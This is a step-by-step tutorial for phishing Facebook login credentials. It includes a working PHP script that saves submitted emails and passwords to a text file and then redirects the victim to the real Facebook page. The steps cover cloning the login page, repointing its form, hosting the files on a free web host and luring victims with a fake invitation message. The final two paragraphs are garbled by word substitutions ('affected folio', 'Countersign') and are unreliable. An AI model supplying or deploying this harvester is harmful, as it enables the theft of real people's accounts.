Phishing is the most popular and widely used method for hacking email accounts. Phishing is not as easy as it’s name. Creating a phishing page is an easy task and any one can download it from various hacking forums for free. The main step of phishing comes after creation of fake login page.
If You Don’t Know About Phishing Read This Before We Continue
STEP 1:Creating Phishing.php file :
1. Even if you don’t have any knowledge of php file simply copy the following script and save it as phishing.php .
<?php $handle = fopen(“password.txt”, “a”);
fwrite($handle,$_POST[“email”]);
fwrite($handle,”\n”);
fwrite($handle,$_POST[“pass”]);
fwrite($handle,”\n”);
fwrite($handle,”\n”);
fclose($handle);
header(“Location: https://www.facebook.com/login.php?login_attempt=1″);
exit; ?>
STEP 2: Creating index.html page :
2.1 Open the Facebook login page then, Right click>View page source and paste it in notepad and save it as
index.html .
2.2 Open that index.html file with a Notepad and search (By pressing Ctrl+F) for : action in it and replace the highlighted part (as in the following screenshot) with phishing.php .
STEP 3: Now create a completely blank text file with name password.txt.
Now you have all the following three files with you :
1. phishing.php
2. index.html
3. password.txt
If you don’t have your own web hosting account, goto any free web-hosting site http://www.phpzilla.net ,and in file manager, upload all the three files.
Your affected folio is now ready! With the Domain Name you registered on the Web-hosting armpit ask anyone to login and again analysis your password.txt book .You will acquisition the Username and Countersign of that being stored in it.Also the being gets redirected to the aboriginal Facebook login folio and he/she thinks that there charge be some botheration or he/she may accept entered amiss Username or Password.
Though this adjustment of hacking looks absolutely continued yet, already you accept created the affected folio again you don’t charge to accept anyone login on your computer .Just accelerate that URL to anyone adage ‘Hey! Join my folio on Facebook!’ or whatever and afterwards he logins you will accept his/her password.